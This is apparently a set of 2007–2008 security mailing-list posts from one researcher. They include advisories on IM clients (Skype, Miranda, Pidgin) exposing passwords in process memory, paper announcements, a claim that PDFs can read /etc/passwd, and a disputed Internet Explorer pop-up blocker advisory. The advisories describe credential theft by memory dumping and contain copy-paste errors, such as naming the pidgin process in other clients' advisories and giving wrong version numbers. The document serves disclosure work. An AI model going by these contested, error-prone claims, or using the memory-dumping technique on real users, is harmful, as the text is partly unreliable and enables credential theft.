Skype IM Client Password Disclosure Vulnerability. *Version Affected:* Skype 3.8 / Previous version can be affected. *Release Date:* 11 September 2008 *Description:* The skype client inherits client side password disclosure vulnerability. The credentials used to connect to the required service i.e. username and password is not encrypted properly. The credentials can be extracted in clear text by dumping process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process skype.exe. The skype uses skype.exe and skypepm.exe processes while communicating. The skype.exe dumps password in clear text. * Proof of Concept: **http://evilfingers.com/advisory/skype_pass_dis_vul.pdf http://secniche.org/advisory/skype_vul.pdf cid:part1.09030909.07070102@secniche.org Links: http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php * *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Miranda IM Client Password Disclosure Vulnerability.
Miranda IM Client Password Disclosure Vulnerability. * Version Affected:* 0.7.10 Unicode / Previous version can be affected. * Release Date:* 11 September 2008 * About:* Miranda IM is a multi-protocol instant messaging client for Windows. Very light on system resources and extremely fast, Miranda IM require no installation and can be made to fit on a single floppy disk or USB drive. Featuring a powerful plugin-based framework and boasting over 350 plugins, Miranda IM is one of the most flexible and customizable messaging clients on the planet. * Description:* The Miranda client inherits client side password disclosure vulnerability. The credentials used to connect to the required service i.e. username and password is not encrypted properly. The credentials can be extracted in clear text by dumping process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process miranda32.exe.. *Proof of Concept: http://evilfingers.com/advisory/miranda_im_mem_pass_disc.pdf http://secniche/advisory/miranda_vul.pdf ** cid:part1.03070400.05000503@secniche.org* *Links: *http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php *Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
Pidgin IM Client Password Disclosure Vulnerability.
Pidgin IM Client Password Disclosure Vulnerability. *Version Affected:* 0.7.10 Unicode / Previous version can be affected. *Release Date:* 11 September 2008 *About:* Pidgin is a graphical modular messaging client based on libpurple which is capable of connecting to AIM, MSN, Yahoo!, XMPP, ICQ, IRC, SILC, SIP/SIMPLE, Novell GroupWise, Lotus Sametime, Bonjour, Zephyr, MySpaceIM, Gadu-Gadu, and QQ all at once. It is written using GTK+. *Description:* The pidgin client inherits client side password disclosure vulnerability. The credentials used to connect to the required service i.e. username and password is not encrypted properly. The credentials can be extracted in clear text by dumping process memory of the live pidgin process when a connection is set. The vulnerability allows anyone with access to the client system to obtain the username and password. Additionally, this vulnerability could also be exploited by fooling the user to execute malicious code which would dump the memory of the process pidgin.exe.. *Proof of Concept:* http://evilfingers.com/advisory/pidgin_password_disc_vuln.pdf http://secniche/advisory/pidgin_vul.pdf * cid:part1.02090307.09020405@secniche.org* *Links: * http://secniche.org/advisory.html http://evilfingers.com/advisory/index.php * Credit:* Aditya K Sood *Disclaimer* The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for a ny implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
[Mlabs] Dissecting Internals of Windows XP Svchost : Reverse Engineering Stature
Hi all This is the reverse Engineering layout of Scvhost Internals. |Category : Reverse Engineering Analysis. The paper solely relates to the core internals that build up the Windows XP Svchost. The Svchost internals have not been disseminated into informative elements yet. I have found only one or two analysis but that wont satisfy my views regarding XP Svchost. The anatomy of Svchost has got complexity in its own term. This pushes me to write a specific analysis over it. The analysis provide a structural design with concept wise dissection. The point is to understand the hidden artifacts and how it affects the working aspect of prime service host controller.Every process is disseminated into primary process and secondary process. In terms related to operating system there is a parent process and its child. If one look at the implementation scenario then child processes are undertaken as thread internally. The kernel level implementation is subjugated like this. The XP Svchost runs as threads under services process.| http://mlabs.secniche.org/winxp_svchost.html http://mlabs.secniche.org/papers/Win_Xp_Svc_Int.pdf Regards Aks aka 0kn0ck http://mlabs.secniche.org | http://www.secniche.org
[Mlabs] Scrutinising SIP Payloads : Traversing Attack Vectors in VOIP and IM
Hi I have released core research paper on SIP comprising of Payload problems and Attack vectors. This research paper lays stress on the potential weaknesses present in the SIP which make it vulnerable to stringent attacks. The point of discussion is to understand the weak spots in the protocol. The payloads constitute the request vectors. The protocol inherits well defined security procedures and implementation objects. The security model is hierarchical and is diverged in every working layer of SIP from top to bottom. SIP features can be exploited easily if definitive attack base is subjugated. We will discuss about inherited flaws and methods to combat against predefined attacks. The payloads have to be scrutinized at the network level. It is critical because payloads are considered as infection bases to infect networks . The pros and cons will be enumerated from security perspective. You can download paper at: http://mlabs.secniche.org/papers/Scruti_SIP_Payloads.pdf Regards Aks aka 0kn0ck
Re: 0day: PDF pwns Windows
pdp (architect) wrote: http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers Hi Your point is right. But there are a number of factors other than this in exploiting pdf in other sense. My latest research is working over the exploitation of PDF. Even if you look at the core then there are no restriction on READ in PDF in most of the versions. Only outbound data is filtered to some extent. you can even read /etc/passwd file from inside of PDF. Other infection vector includes infection through Local Area Networks through sharing and printing PDF docs and all. My upcoming research feature everything regarding this and the issue you have already discussed. Regards Aks http://ww.secniche.org
[Paper] The Anatomy of Third Party Pop Up Attacks.
Hi This article deals with the latest third party popup attacks that are performed by an attacker from the rogue and vulnerable links of the web sites to circumvent the normal functioning on the web. The target website always seems to be the liable web provider from where the popup attacks are possible. It also discusses other problems related with Pop Ups. You can find it at: http://www.secniche.org/papers/Analogy_of_Popups.pdf http://www.secniche.org/paper.html Regards Aks http://www.secniche.org
SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability
Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability Dated : 15 August 2007 Severity : Critical Explanation : The vulnerability persists in the popup blocker functioning to allow specific websites to execute popup in the running instance of Internet Explorer. An attacker can easily exploits it by enabling a browser to run a malicious script in the context of Internet Explorer. The script manipulates the registry entries for specific websites through Javascript. It adds fake or malicious websites as an allowed websites in the pop up blocker. The cause user visiting a untrusted website or any othe malicious cause. Detail Advisory : http://www.secniche.org/advisory/Internet_Pop_Phish_Dos_Adv.pdf http://www.secniche.org/adv.html Proof of Concept : Level 1 Infection Test http://www.secniche.org/misc/ie_pop_by_level1_test.zip Test run fine locally as well with Web server [IIS] automated server object calling. Infection through Active X Object. Regards AKS aka 0kn0ck http://www.secniche.org
Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability
Debasis Mohanty wrote: No offence intended but if you take a little more effort of validating your work before posting publicly then you can save yourself from embarrassment. I don't see anything in the script that can bypass zone security and run successfully from internet zone. I am sure you have tested it locally and drawn conclusion that the script can execute from internet zone. To test the script from internet zone, you need to upload it to a webserver and try accessing via browser. Any VB/Java script will run from local security with a charm but if you can make it run from internet zone (without a prompt) then you found a holy grail. However I don't see anything in the script which can defeat zone security and access registry, hence no vulnerability. The best way to validate your work before posting publicly is, run it through the vendor or third party security sites like secunia or idefence. This would certainly save you from public embarrassment. -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Aditya K Sood Sent: 17 August 2007 09:07 To: [EMAIL PROTECTED]; bugtraq@securityfocus.com; [EMAIL PROTECTED]; Steven M. Christey Subject: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability Advisory : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability Dated : 15 August 2007 Severity : Critical Explanation : The vulnerability persists in the popup blocker functioning to allow specific websites to execute popup in the running instance of Internet Explorer. An attacker can easily exploits it by enabling a browser to run a malicious script in the context of Internet Explorer. The script manipulates the registry entries for specific websites through Javascript. It adds fake or malicious websites as an allowed websites in the pop up blocker. The cause user visiting a untrusted website or any othe malicious cause. Detail Advisory : http://www.secniche.org/advisory/Internet_Pop_Phish_Dos_Adv.pdf http://www.secniche.org/adv.html Proof of Concept : Level 1 Infection Test http://www.secniche.org/misc/ie_pop_by_level1_test.zip Test run fine locally as well with Web server [IIS] automated server object calling. Infection through Active X Object. Regards AKS aka 0kn0ck http://www.secniche.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Hi /Any VB/Java script will run from local security with a charm but if you can make it run from internet zone (without a prompt) then you found a holy grail. However I don't see anything in the script which can defeat zone security and access registry, hence no vulnerability./ No problem. I think every script that runs from the Internet zone prompts.Mr. Debasish. Most of the time locally it prompts too. I hope you can find any method that an active X control does not prompt. You are good at bypassing things. /I don't see anything in the script that can bypass zone security and run successfully from internet zone. I am sure you have tested it locally and drawn conclusion that the script can execute from internet zone. To test the script from internet zone, you need to upload it to a webserver and try accessing via browser. / I think I have told the practical citation clearly. The automation object is required. The best way to validate your work before posting publicly is, run it through the vendor or third party security sites like secunia or idefence. This would certainly save you from public embarrassment. Embarrassment. Nothing lies beneath it. Critically your are too much at of your own in deciding. Regards AKS
[Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON
hi A specific white paper have been released comprising of specific application problems related to Bison. You can look into it. http://www.secniche.org/papers/Ser_Insec_Bison.pdf Regards AKS http://www.secniche.org
[CVE-2007-3816][Advisory] JWIG Context-Dependent Template Calling Dos
Advisory : JWIG Context-Dependent Template Calling Dos CVE- 2007-3816 Dated : 12 July 2007 Vulnerable Software : BRICS, JWIG Severity : Intermediate Explanation: JWIG might allow context-dependent attackers to cause a denial of service (service degradation) via loops of references to external templates. For more details : http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf Links: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3816 http://nvd.nist.gov/cpe.cfm?cvename=CVE-2007-3816 Regards Aditya K Sood SecNiche Security
WhitePapers By SecNiche Security
Hi all The whitepapers regarding Java Web Security Technologies have been released. 1. JNLP Security Convergence : http://www.secniche.org/papers/JNLP_Security_Con.pdf 2. Hack Annotations in JWIG : http://www.secniche.org/papers/HackAnnotationsInJWIG.pdf Regards Aditya K Sood SecNiche Security
Advisory : Internet Explorer Zone Domain Specification Dos and Page suppressing.
Advisory : Internet Explorer Zone Domain Specification Dos and Page Suppressing Severity : Intermediate Version : IE 6.0 - 7.0 Dated : 18 June 2007 Explanation: The vulnerability is present in handling of domain names with different parameters [ sub domains] when specified in the Intranet zone and Restricted zone with different characters [* ,.]. TheInternet Explorer show weird behavior in opening of those websites. The problem occurs in loading of those websites there by resulting in DoS through the browser. The problem occurs in resolving domain names in different zones by the explorer. It can be launched remotely by a malicious attacker by exploiting this vulnerable behavior through a rogue script and registry functions. The problem persists if rogue entries or manipulated entries are subjected into various zones. So when a new instance of IE is loaded , the registry entries are triggered up there by resulting in security impacts. The website page gets suppressed. The page gets hanged for sometime , there by showing a delay in loading of website and affects the CPU load. Vendor Status : Reported To Microsoft Security Center. Solution By Microsoft Security Center: 1. Avoid visiting untrusted Websites. 2. Script Restriction should be applied. - Aditya K Sood http://www.secniche.org
Project CERA Is Up Again : Secniche Initiative
Hi all The project CERA is up again. CERA : Cutting Edge Research Arena. You can look into it. http://cera.secniche.org Regards Aditya K Sood aka Zeroknock http://www.secniche.org
MLabs is Shifted Fully : SecNiche Initiative
Hi all The Mlabs have been fully shifted to secniche domain. You can check it: http://mlabs.secniche.org Regards Aditya K Sood aka Zeroknock http://www.secniche.org
SECNICHE : Dwelling Security is On the Run
Hi all The Sec Niche : dwelling Security portal is up fully. Its a personal working arena and consultancy domain of mine.You can check it: http://www.secniche.org Number of papers have been transformed ot secniche and many more will be added as soon as they are ready. So run a bit. Aditya K Sood aka Zeroknock http://www.secniche.org